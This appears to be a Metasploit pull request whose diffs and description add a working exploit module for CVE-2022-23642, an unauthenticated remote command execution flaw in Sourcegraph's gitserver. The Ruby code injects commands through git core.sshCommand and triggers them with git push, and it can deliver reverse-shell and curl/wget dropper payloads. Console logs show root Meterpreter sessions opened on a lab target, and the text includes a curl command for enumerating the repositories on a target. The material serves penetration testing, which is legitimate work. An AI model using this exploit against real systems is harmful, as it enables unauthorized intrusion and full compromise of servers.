### PR TITLE
Add exploit for CVE-2022-23642 Sourcegraph gitserver exec RCE

### DIFF
--- a/documentation/modules/exploit/linux/http/sourcegraph_gitserver_sshcmd.md
+++ b/documentation/modules/exploit/linux/http/sourcegraph_gitserver_sshcmd.md
@@ -1,0 +1,87 @@
+## Vulnerable Application
+
+ lorem ip sum blah blah
+ 
+
+
+
+
+## Verification Steps
+3. Install the application
+   1. Install and run it through docker
+```
+docker run \
+  --publish 3178:3178 \
+  --publish 7080:7080 \
+  --publish 127.0.0.1:3370:3370 \
+  --rm \
+  --volume ~/.sourcegraph/config:/etc/sourcegraph \
+  --volume ~/.sourcegraph/data:/var/opt/sourcegraph \
+  sourcegraph/server:3.37.0
+```
+2. Configure a cloned repo, use a github access token
+
+
+4. Start msfconsole
+5. Do: `use [module path]`
+6. Set the options
+7. Do: `run`
+8. You should get a shell.
+
+## Options
+List each option and how to use it.
+
+### EXISTING_REPO
+
+An existing cloned repo on the server. If none is specified, one will be automatically determined.
+
+## Scenarios
+
+### SourceGraph v3.37.0 running on Docker
+
+```
+msf6 exploit(linux/http/sourcegraph_gitserver_sshcmd) > show options
+
+Module options (exploit/linux/http/sourcegraph_gitserver_sshcmd):
+
+   Name           Current Setting  Required  Description
+   ----           ---------------  --------  -----------
+   EXISTING_REPO                   no        An existing, cloned repository
+   Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS         192.168.159.128  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT          3178             yes       The target port (TCP)
+   SRVHOST        0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT        8080             yes       The local port to listen on.
+   SSL            false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                         no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI      /                yes       Base path
+   URIPATH                         no        The URI to use for this exploit (default is random)
+   VHOST                           no        HTTP server virtual host
+
+
+Payload options (cmd/unix/reverse_bash):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.159.128  yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix Command
+
+
+msf6 exploit(linux/http/sourcegraph_gitserver_sshcmd) > exploit
+
+[*] Started reverse TCP handler on 192.168.159.128:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable.
+[*] Using automatically identified repository: github.com/zerosteiner/gh-sandbox
+[*] Executing Unix Command target
+
+id
+uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
+```

--- a/documentation/modules/exploit/linux/http/sourcegraph_gitserver_sshcmd.md
+++ b/documentation/modules/exploit/linux/http/sourcegraph_gitserver_sshcmd.md
@@ -1,87 +1,95 @@
 ## Vulnerable Application
 
- lorem ip sum blah blah
- 
+A vulnerability exists within Sourcegraph's gitserver component that allows a remote attacker to execute
+arbitrary OS commands by modifying the core.sshCommand value within the git configuration. This command can
+then be triggered on demand by executing a git push operation. The vulnerability was patched by introducing a
+feature flag in version 3.37.0. This flag must be enabled for the protections to be in place which filter the
+commands that are able to be executed through the git exec REST API.
 
-
-
+The cloned repositories can be enumerated from the `/list` endpoint using the curl command:
+`curl http://$target:3178/list?cloned=true`
 
 ## Verification Steps
-3. Install the application
-   1. Install and run it through docker
-```
-docker run \
-  --publish 3178:3178 \
-  --publish 7080:7080 \
-  --publish 127.0.0.1:3370:3370 \
-  --rm \
-  --volume ~/.sourcegraph/config:/etc/sourcegraph \
-  --volume ~/.sourcegraph/data:/var/opt/sourcegraph \
-  sourcegraph/server:3.37.0
-```
-2. Configure a cloned repo, use a github access token
+Example steps in this format (is also in the PR):
 
+1. Install the application (see detailed Docker Installation section below)
+2. Start msfconsole
+3. Do: `use exploits/linux/http/sourcegraph_gitserver_sshcmd`
+4. Set the `RHOSTS`, `PAYLOAD` and any payload related options that are necessary
+5. Do: `run`
 
-4. Start msfconsole
-5. Do: `use [module path]`
-6. Set the options
-7. Do: `run`
-8. You should get a shell.
+### Docker Installation
+1. Run the following command to start the all-inclusive docker container for Sourcegraph v3.36.3.
+
+    ```
+    docker run \
+      --publish 3178:3178 \
+      --publish 7080:7080 \
+      --publish 127.0.0.1:3370:3370 \
+      --rm \
+      --volume /tmp/sourcegraph/config:/etc/sourcegraph \
+      --volume /tmp/sourcegraph/data:/var/opt/sourcegraph \
+      sourcegraph/server:3.36.3
+    ```
+2. Once the service has started, navigate to the webinterface at http://localhost:7080
+3. When prompted, create an administrator's account
+4. At least one git repository must be added, complete the following steps to add one.
+    1. Navigate to `Repositories > Managed code hosts`
+    2. Select "Generic Git host"
+    3. When prompted, use the following example JSON code to clone Metasploit.
+
+        ```
+        {
+          "url": "https://github.com/",
+          "repos": [
+            "rapid7/metasploit-framework.git"
+          ]
+        }
+       ```
 
 ## Options
-List each option and how to use it.
 
 ### EXISTING_REPO
 
-An existing cloned repo on the server. If none is specified, one will be automatically determined.
+An existing, cloned repository. If this value is not set, a random one will be selected from the server.
 
 ## Scenarios
 
-### SourceGraph v3.37.0 running on Docker
+### Docker v3.36.3
 
 ```
-msf6 exploit(linux/http/sourcegraph_gitserver_sshcmd) > show options
-
-Module options (exploit/linux/http/sourcegraph_gitserver_sshcmd):
-
-   Name           Current Setting  Required  Description
-   ----           ---------------  --------  -----------
-   EXISTING_REPO                   no        An existing, cloned repository
-   Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOSTS         192.168.159.128  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
-   RPORT          3178             yes       The target port (TCP)
-   SRVHOST        0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
-   SRVPORT        8080             yes       The local port to listen on.
-   SSL            false            no        Negotiate SSL/TLS for outgoing connections
-   SSLCert                         no        Path to a custom SSL certificate (default is randomly generated)
-   TARGETURI      /                yes       Base path
-   URIPATH                         no        The URI to use for this exploit (default is random)
-   VHOST                           no        HTTP server virtual host
-
-
-Payload options (cmd/unix/reverse_bash):
-
-   Name   Current Setting  Required  Description
-   ----   ---------------  --------  -----------
-   LHOST  192.168.159.128  yes       The listen address (an interface may be specified)
-   LPORT  4444             yes       The listen port
-
-
-Exploit target:
-
-   Id  Name
-   --  ----
-   0   Unix Command
-
-
+msf6 > use exploit/linux/http/sourcegraph_gitserver_sshcmd
+[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(linux/http/sourcegraph_gitserver_sshcmd) > set RHOSTS 192.168.159.128
+RHOSTS => 192.168.159.128
+msf6 exploit(linux/http/sourcegraph_gitserver_sshcmd) > set TARGET Unix\ Command 
+TARGET => Unix Command
+msf6 exploit(linux/http/sourcegraph_gitserver_sshcmd) > set PAYLOAD cmd/unix/python/meterpreter/reverse_tcp
+PAYLOAD => cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(linux/http/sourcegraph_gitserver_sshcmd) > set LHOST 192.168.250.134
+LHOST => 192.168.250.134
+msf6 exploit(linux/http/sourcegraph_gitserver_sshcmd) > check
+[+] 192.168.159.128:3178 - The target is vulnerable. Successfully set core.sshCommand.
 msf6 exploit(linux/http/sourcegraph_gitserver_sshcmd) > exploit
 
-[*] Started reverse TCP handler on 192.168.159.128:4444 
+[*] Started reverse TCP handler on 192.168.250.134:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
-[+] The target is vulnerable.
+[+] The target is vulnerable. Successfully set core.sshCommand.
 [*] Using automatically identified repository: github.com/zerosteiner/gh-sandbox
 [*] Executing Unix Command target
+[*] Sending stage (40168 bytes) to 172.17.0.2
+[*] Sending stage (40168 bytes) to 172.17.0.2
+[*] Meterpreter session 1 opened (192.168.250.134:4444 -> 172.17.0.2:59116) at 2022-07-08 17:23:15 -0400
+[*] Meterpreter session 2 opened (192.168.250.134:4444 -> 172.17.0.2:59124) at 2022-07-08 17:23:15 -0400
 
-id
-uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
+meterpreter > 
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer        : caab8e904df4
+OS              : Linux 5.17.12-100.fc34.x86_64 #1 SMP PREEMPT Mon May 30 17:47:02 UTC 2022
+Architecture    : x64
+System Language : en_US
+Meterpreter     : python/linux
+meterpreter > 
 ```

--- a/modules/exploits/linux/http/sourcegraph_gitserver_sshcmd.rb
+++ b/modules/exploits/linux/http/sourcegraph_gitserver_sshcmd.rb
@@ -7,6 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   Rank = ExcellentRanking
 
+  prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::CmdStager
 
@@ -16,8 +17,11 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => '',
         'Description' => %q{
+          lorem ip sum blah blah
         },
         'Author' => [
+          'Altelus1', # github PoC
+          'Spencer McIntyre' # metasploit module
         ],
         'References' => [
           ['CVE', '2022-23642'],
@@ -28,7 +32,6 @@ class MetasploitModule < Msf::Exploit::Remote
         'License' => MSF_LICENSE,
         'Platform' => ['unix', 'linux'],
         'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
-        'Privileged' => true,
         'Targets' => [
           [
             'Unix Command',
@@ -65,6 +68,26 @@ class MetasploitModule < Msf::Exploit::Remote
     ])
   end
 
+  def check
+    begin
+      cloned_repos = send_request_list
+    rescue RuntimeError => e
+      return CheckCode::Unknown(e.message)
+    end
+
+    if cloned_repos.empty?
+      vprint_warning('There must be at least 1 cloned repo to be exploitable.')
+      return CheckCode::Detected
+    end
+
+    res = send_request_exec(cloned_repos.sample, ['config', 'core.sshCommand', 'fake'])
+    if res && res.body =~ /^X-Exec-Exit-Status: 0/
+      return CheckCode::Vulnerable('Successfully set core.sshCommand.')
+    end
+
+    CheckCode::Safe('Failed to set core.sshCommand.')
+  end
+
   def exploit
     if datastore['EXISTING_REPO'].blank?
       existing_repo = send_request_list.sample
@@ -72,6 +95,8 @@ class MetasploitModule < Msf::Exploit::Remote
     else
       existing_repo = datastore['EXISTING_REPO']
     end
+
+    # validate that the repo exists, if it was automatically determined ensure at least one is present
 
     print_status("Executing #{target.name} target")
 
@@ -102,8 +127,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'GET',
       'vars_get' => { 'cloned' => 'true' }
     })
-    fail_with(Failure::Unreachable, 'No server response') unless res
-    fail_with(Failure::UnexpectedReply, 'Failed to list repositories') unless res.code == 200 && res.get_json_document.is_a?(Array)
+    fail_with(Failure::Unreachable, 'No server response.') unless res
+    fail_with(Failure::UnexpectedReply, 'Failed to list repositories.') unless res.code == 200 && res.get_json_document.is_a?(Array)
 
     res.get_json_document
   end
@@ -112,11 +137,14 @@ class MetasploitModule < Msf::Exploit::Remote
     repo = opts['repo']
 
     vprint_status('Setting the sshCommand')
-    send_request_exec(repo, ['config', 'core.sshCommand', cmd])
+    res = send_request_exec(repo, ['config', 'core.sshCommand', cmd])
+    fail_with(Failure::UnexpectedReply, 'The gitserver exec API call failed.') unless res&.code == 200
 
     vprint_status('Setting a fake origin')
+    # TODO: check if this can be set fewer times
     origin = Rex::Text.rand_text_alphanumeric(rand(4..11))
     send_request_exec(repo, ['remote', 'add', origin, "git@#{Rex::Text.rand_text_alphanumeric(rand(4..11))}:#{Rex::Text.rand_text_alphanumeric(rand(4..11))}.git"])
+    fail_with(Failure::UnexpectedReply, 'The gitserver exec API call failed.') unless res&.code == 200
 
     vprint_status('Triggering command using push')
     send_request_exec(repo, ['push', origin, 'master'], 5)

--- a/modules/exploits/linux/http/sourcegraph_gitserver_sshcmd.rb
+++ b/modules/exploits/linux/http/sourcegraph_gitserver_sshcmd.rb
@@ -75,28 +75,28 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    begin
-      cloned_repos = send_request_list
-    rescue RuntimeError => e
-      return CheckCode::Unknown(e.message)
-    end
+    res = send_request_exec(Rex::Text.rand_text_alphanumeric(4..11), ['config', '--default', '', 'core.sshCommand'])
+    return CheckCode::Unknown unless res
 
-    if cloned_repos.empty?
-      vprint_warning('There must be at least 1 cloned git repo to be exploitable.')
-      return CheckCode::Detected
-    end
-
-    res = send_request_exec(cloned_repos.sample, ['config', '--default', '', 'core.sshCommand'])
-    if res && res.code == 200 && res.body =~ /^X-Exec-Exit-Status: 0/
+    if res.code == 200 && res.body =~ /^X-Exec-Exit-Status: 0/
+      # this is the response if the target repo does exist, highly unlikely since it's randomized
       return CheckCode::Vulnerable('Successfully set core.sshCommand.')
+    elsif res.code == 404 && res.body =~ /"cloneInProgress"/
+      # this is the response if the target repo does not exist
+      return CheckCode::Vulnerable
+    elsif res.code == 400 && res.body =~ /^invalid command/
+      # this is the response when the server is patched, regardless of if there are cloned repos
+      return CheckCode::Safe
     end
 
-    CheckCode::Safe('Failed to set core.sshCommand.')
+    CheckCode::Unknown
   end
 
   def exploit
     if datastore['EXISTING_REPO'].blank?
       @git_repo = send_request_list.sample
+      fail_with(Failure::NotFound, 'Did not identify any cloned repositories on the remote server.') unless @git_repo
+
       print_status("Using automatically identified repository: #{@git_repo}")
     else
       @git_repo = datastore['EXISTING_REPO']
@@ -156,7 +156,13 @@ class MetasploitModule < Msf::Exploit::Remote
     vprint_status("Executing command: #{cmd}")
     res = send_request_exec(@git_repo, ['config', 'core.sshCommand', cmd])
     fail_with(Failure::Unreachable, 'No server response.') unless res
-    fail_with(Failure::UnexpectedReply, 'The gitserver exec API call failed.') unless res.code == 200 && res.body =~ /^X-Exec-Exit-Status: 0/
+    unless res.code == 200 && res.body =~ /^X-Exec-Exit-Status: 0/
+      if res.code == 404 && res.get_json_document.is_a?(Hash) && res.get_json_document['cloneInProgress'] == false
+        fail_with(Failure::BadConfig, 'The specified repository has not been cloned.')
+      end
+
+      fail_with(Failure::UnexpectedReply, 'The gitserver exec API call failed.')
+    end
 
     send_request_exec(@git_repo, ['push', @git_origin, 'master'], 5)
   end

--- a/modules/exploits/linux/http/sourcegraph_gitserver_sshcmd.rb
+++ b/modules/exploits/linux/http/sourcegraph_gitserver_sshcmd.rb
@@ -104,15 +104,16 @@ class MetasploitModule < Msf::Exploit::Remote
 
     print_status("Executing #{target.name} target")
 
-    @git_origin = Rex::Text.rand_text_alphanumeric(rand(4..11))
+    @git_origin = Rex::Text.rand_text_alphanumeric(4..11)
+    git_remote = "git@#{Rex::Text.rand_text_alphanumeric(4..11)}:#{Rex::Text.rand_text_alphanumeric(4..11)}.git"
     vprint_status("Using #{@git_origin} as a fake git origin")
-    send_request_exec(@git_repo, ['remote', 'add', @git_origin, "git@#{Rex::Text.rand_text_alphanumeric(rand(4..11))}:#{Rex::Text.rand_text_alphanumeric(rand(4..11))}.git"])
+    send_request_exec(@git_repo, ['remote', 'add', @git_origin, git_remote])
 
     case target['Type']
     when :unix_memory
-      execute_command(payload.encoded, 'git_origin' => @git_origin)
+      execute_command(payload.encoded)
     when :linux_dropper
-      execute_cmdstager('git_origin' => @git_origin)
+      execute_cmdstager
     end
   end
 
@@ -124,10 +125,12 @@ class MetasploitModule < Msf::Exploit::Remote
     send_request_exec(@git_repo, ['remote', 'remove', @git_origin])
     # unset the core.sshCommand value
     send_request_exec(@git_repo, ['config', '--unset', 'core.sshCommand'])
+  ensure
+    super
   end
 
   def send_request_exec(repo, args, timeout = 20)
-    res = send_request_cgi({
+    send_request_cgi({
       'uri' => normalize_uri(target_uri.path, 'exec'),
       'method' => 'POST',
       'data' => {
@@ -135,8 +138,6 @@ class MetasploitModule < Msf::Exploit::Remote
         'Args' => args
       }.to_json
     }, timeout)
-
-    res
   end
 
   def send_request_list

--- a/modules/exploits/linux/http/sourcegraph_gitserver_sshcmd.rb
+++ b/modules/exploits/linux/http/sourcegraph_gitserver_sshcmd.rb
@@ -1,0 +1,127 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => '',
+        'Description' => %q{
+        },
+        'Author' => [
+        ],
+        'References' => [
+          ['CVE', '2022-23642'],
+          ['URL', 'https://github.com/sourcegraph/sourcegraph/security/advisories/GHSA-qcmp-fx72-q8q9'],
+          ['URL', 'https://github.com/Altelus1/CVE-2022-23642'],
+        ],
+        'DisclosureDate' => '2022-02-18', # Public disclosure
+        'License' => MSF_LICENSE,
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_memory
+            },
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :linux_dropper
+            },
+          ]
+        ],
+        'DefaultTarget' => 1,
+        'DefaultOptions' => {
+          'RPORT' => 3178
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/']),
+      OptString.new('EXISTING_REPO', [false, 'An existing, cloned repository'])
+    ])
+  end
+
+  def exploit
+    if datastore['EXISTING_REPO'].blank?
+      existing_repo = send_request_list.sample
+      print_status("Using automatically identified repository: #{existing_repo}")
+    else
+      existing_repo = datastore['EXISTING_REPO']
+    end
+
+    print_status("Executing #{target.name} target")
+
+    case target['Type']
+    when :unix_memory
+      execute_command(payload.encoded, 'repo' => existing_repo)
+    when :linux_dropper
+      execute_cmdstager('repo' => existing_repo)
+    end
+  end
+
+  def send_request_exec(repo, args, timeout = 20)
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'exec'),
+      'method' => 'POST',
+      'data' => {
+        'Repo' => repo,
+        'Args' => args
+      }.to_json
+    }, timeout)
+
+    res
+  end
+
+  def send_request_list
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'list'),
+      'method' => 'GET',
+      'vars_get' => { 'cloned' => 'true' }
+    })
+    fail_with(Failure::Unreachable, 'No server response') unless res
+    fail_with(Failure::UnexpectedReply, 'Failed to list repositories') unless res.code == 200 && res.get_json_document.is_a?(Array)
+
+    res.get_json_document
+  end
+
+  def execute_command(cmd, opts = {})
+    repo = opts['repo']
+
+    vprint_status('Setting the sshCommand')
+    send_request_exec(repo, ['config', 'core.sshCommand', cmd])
+
+    vprint_status('Setting a fake origin')
+    origin = Rex::Text.rand_text_alphanumeric(rand(4..11))
+    send_request_exec(repo, ['remote', 'add', origin, "git@#{Rex::Text.rand_text_alphanumeric(rand(4..11))}:#{Rex::Text.rand_text_alphanumeric(rand(4..11))}.git"])
+
+    vprint_status('Triggering command using push')
+    send_request_exec(repo, ['push', origin, 'master'], 5)
+
+    send_request_exec(repo, ['remote', 'remove', origin])
+  end
+
+end

--- a/modules/exploits/linux/http/sourcegraph_gitserver_sshcmd.rb
+++ b/modules/exploits/linux/http/sourcegraph_gitserver_sshcmd.rb
@@ -15,9 +15,13 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name' => '',
+        'Name' => 'Sourcegraph gitserver sshCommand RCE',
         'Description' => %q{
-          lorem ip sum blah blah
+          A vulnerability exists within Sourcegraph's gitserver component that allows a remote attacker to execute
+          arbitrary OS commands by modifying the core.sshCommand value within the git configuration. This command can
+          then be triggered on demand by executing a git push operation. The vulnerability was patched by introducing a
+          feature flag in version 3.37.0. This flag must be enabled for the protections to be in place which filter the
+          commands that are able to be executed through the git exec REST API.
         },
         'Author' => [
           'Altelus1', # github PoC
@@ -45,12 +49,14 @@ class MetasploitModule < Msf::Exploit::Remote
             'Linux Dropper',
             {
               'Platform' => 'linux',
+              # when the OS command is executed, it's executed twice which will cause some of the command stagers to
+              # be corrupt, these two work even for larger payloads because they're downloaded in a single command
+              'CmdStagerFlavor' => %w[curl wget],
               'Arch' => [ARCH_X86, ARCH_X64],
               'Type' => :linux_dropper
             },
           ]
         ],
-        'DefaultTarget' => 1,
         'DefaultOptions' => {
           'RPORT' => 3178
         },
@@ -76,12 +82,12 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     if cloned_repos.empty?
-      vprint_warning('There must be at least 1 cloned repo to be exploitable.')
+      vprint_warning('There must be at least 1 cloned git repo to be exploitable.')
       return CheckCode::Detected
     end
 
-    res = send_request_exec(cloned_repos.sample, ['config', 'core.sshCommand', 'fake'])
-    if res && res.body =~ /^X-Exec-Exit-Status: 0/
+    res = send_request_exec(cloned_repos.sample, ['config', '--default', '', 'core.sshCommand'])
+    if res && res.code == 200 && res.body =~ /^X-Exec-Exit-Status: 0/
       return CheckCode::Vulnerable('Successfully set core.sshCommand.')
     end
 
@@ -90,22 +96,34 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     if datastore['EXISTING_REPO'].blank?
-      existing_repo = send_request_list.sample
-      print_status("Using automatically identified repository: #{existing_repo}")
+      @git_repo = send_request_list.sample
+      print_status("Using automatically identified repository: #{@git_repo}")
     else
-      existing_repo = datastore['EXISTING_REPO']
+      @git_repo = datastore['EXISTING_REPO']
     end
-
-    # validate that the repo exists, if it was automatically determined ensure at least one is present
 
     print_status("Executing #{target.name} target")
 
+    @git_origin = Rex::Text.rand_text_alphanumeric(rand(4..11))
+    vprint_status("Using #{@git_origin} as a fake git origin")
+    send_request_exec(@git_repo, ['remote', 'add', @git_origin, "git@#{Rex::Text.rand_text_alphanumeric(rand(4..11))}:#{Rex::Text.rand_text_alphanumeric(rand(4..11))}.git"])
+
     case target['Type']
     when :unix_memory
-      execute_command(payload.encoded, 'repo' => existing_repo)
+      execute_command(payload.encoded, 'git_origin' => @git_origin)
     when :linux_dropper
-      execute_cmdstager('repo' => existing_repo)
+      execute_cmdstager('git_origin' => @git_origin)
     end
+  end
+
+  def cleanup
+    return unless @git_repo && @git_origin
+
+    vprint_status('Cleaning up the git changes...')
+    # delete the remote that was created
+    send_request_exec(@git_repo, ['remote', 'remove', @git_origin])
+    # unset the core.sshCommand value
+    send_request_exec(@git_repo, ['config', '--unset', 'core.sshCommand'])
   end
 
   def send_request_exec(repo, args, timeout = 20)
@@ -128,28 +146,18 @@ class MetasploitModule < Msf::Exploit::Remote
       'vars_get' => { 'cloned' => 'true' }
     })
     fail_with(Failure::Unreachable, 'No server response.') unless res
-    fail_with(Failure::UnexpectedReply, 'Failed to list repositories.') unless res.code == 200 && res.get_json_document.is_a?(Array)
+    fail_with(Failure::UnexpectedReply, 'The gitserver list API call failed.') unless res.code == 200 && res.get_json_document.is_a?(Array)
 
     res.get_json_document
   end
 
-  def execute_command(cmd, opts = {})
-    repo = opts['repo']
+  def execute_command(cmd, _opts = {})
+    vprint_status("Executing command: #{cmd}")
+    res = send_request_exec(@git_repo, ['config', 'core.sshCommand', cmd])
+    fail_with(Failure::Unreachable, 'No server response.') unless res
+    fail_with(Failure::UnexpectedReply, 'The gitserver exec API call failed.') unless res.code == 200 && res.body =~ /^X-Exec-Exit-Status: 0/
 
-    vprint_status('Setting the sshCommand')
-    res = send_request_exec(repo, ['config', 'core.sshCommand', cmd])
-    fail_with(Failure::UnexpectedReply, 'The gitserver exec API call failed.') unless res&.code == 200
-
-    vprint_status('Setting a fake origin')
-    # TODO: check if this can be set fewer times
-    origin = Rex::Text.rand_text_alphanumeric(rand(4..11))
-    send_request_exec(repo, ['remote', 'add', origin, "git@#{Rex::Text.rand_text_alphanumeric(rand(4..11))}:#{Rex::Text.rand_text_alphanumeric(rand(4..11))}.git"])
-    fail_with(Failure::UnexpectedReply, 'The gitserver exec API call failed.') unless res&.code == 200
-
-    vprint_status('Triggering command using push')
-    send_request_exec(repo, ['push', origin, 'master'], 5)
-
-    send_request_exec(repo, ['remote', 'remove', origin])
+    send_request_exec(@git_repo, ['push', @git_origin, 'master'], 5)
   end
 
 end


### PR DESCRIPTION
This module leverages an unauthenticated RCE in Sourcegraph's gitserver component. The result is OS command execution in the context of gitserver. The OS command is executed twice, which shouldn't be a problem for most payloads. The command stagers however were broken when spread across multiple commands because the binary would be corrupted. To fix this, the `curl` and `wget` flavors are used which download the binary in a single operation.

Steps to install and configure Sorucegraph are available in the docs. The module requires no configuration outside of the standard RHOST, PAYLOAD, LHOST (if applicable) values. At least one repository needs to be present on the remote server in order to be vulnerable. These can be enumerated with the curl command: `curl http://$target:3178/list?cloned=true`. The module will attempt to enumerate these and select one at random. Sourcegraph prompts the user to add a repository as the first step after installation so it seems reasonable that this would not be a major limitation. The gitserver port is not exposed by default in docker however, so that's a decent limitation, it's likely exposed when multiple servers are used since the front end would need to communicate with it.

### A Note On Vulnerable Versions
The [CVE](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23642) description states the issue was patched in Sourcegraph v3.37, presumably in this PR https://github.com/sourcegraph/sourcegraph/pull/30833. That PR however notes that the protection is behind a feature flag that is initialized to false in that PR. The feature flag is not enabled by default until [this commit](https://github.com/sourcegraph/sourcegraph/commit/baff5680d7e3d90c4eceb9eb775733e0dcb504fd). Which was first released in the v3.37 tag which algins with the CVE description. However despite this flag being "default" what I have observed is that the docker container for version 3.37, 3.38, 3.39, 3.40 and 3.41 are all vulnerable out of the box. From the site-administration page (on HTTP port 7080) the configuration can be accessed and modified from `Configuration > Site configuration`. The flag can then be toggled by adding `"experimentalFeatures": { "enableGitServerCommandExecFilter": true
}`. The UI offers friendly tab completion which confirms that `true` is the default value. **However, without explicitly editing this configuration, the out-of-the-box docker instance appears to be vulnerable.** So that's cool, maybe I misunderstood what they mean by "default".

![image](https://user-images.githubusercontent.com/2058303/178074432-dd20a569-104b-45fe-856d-309417008d89.png)

So from what I've observed, the module continues to work on the latest stable version if the gitserver service is accessible and the administrator has not taken the extra step to configure that experimental feature. The check method works accurately in both cases.

## Verification

- [ ]  Install the application (see the detailed [Docker Installation](https://github.com/zeroSteiner/metasploit-framework/blob/63734832b2ad3c9aa4215ee626f0898b3e0a0559/documentation/modules/exploit/linux/http/sourcegraph_gitserver_sshcmd.md?plain=1#L21) section in the docs)
- [ ]  Start msfconsole
- [ ]  Do: `use exploits/linux/http/sourcegraph_gitserver_sshcmd`
- [ ]  Set the `RHOSTS`, `PAYLOAD` and any payload related options that are necessary
- [ ]  Do: `run`

## Demo

```
msf6 > use exploit/linux/http/sourcegraph_gitserver_sshcmd
[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/http/sourcegraph_gitserver_sshcmd) > set RHOSTS 192.168.159.128
RHOSTS => 192.168.159.128
msf6 exploit(linux/http/sourcegraph_gitserver_sshcmd) > set TARGET Unix\ Command 
TARGET => Unix Command
msf6 exploit(linux/http/sourcegraph_gitserver_sshcmd) > set PAYLOAD cmd/unix/python/meterpreter/reverse_tcp
PAYLOAD => cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/http/sourcegraph_gitserver_sshcmd) > set LHOST 192.168.250.134
LHOST => 192.168.250.134
msf6 exploit(linux/http/sourcegraph_gitserver_sshcmd) > check
[+] 192.168.159.128:3178 - The target is vulnerable. Successfully set core.sshCommand.
msf6 exploit(linux/http/sourcegraph_gitserver_sshcmd) > exploit
[*] Started reverse TCP handler on 192.168.250.134:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Successfully set core.sshCommand.
[*] Using automatically identified repository: github.com/zerosteiner/gh-sandbox
[*] Executing Unix Command target
[*] Sending stage (40168 bytes) to 172.17.0.2
[*] Sending stage (40168 bytes) to 172.17.0.2
[*] Meterpreter session 1 opened (192.168.250.134:4444 -> 172.17.0.2:59116) at 2022-07-08 17:23:15 -0400
[*] Meterpreter session 2 opened (192.168.250.134:4444 -> 172.17.0.2:59124) at 2022-07-08 17:23:15 -0400
meterpreter > 
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer        : caab8e904df4
OS              : Linux 5.17.12-100.fc34.x86_64 #1 SMP PREEMPT Mon May 30 17:47:02 UTC 2022
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > 
```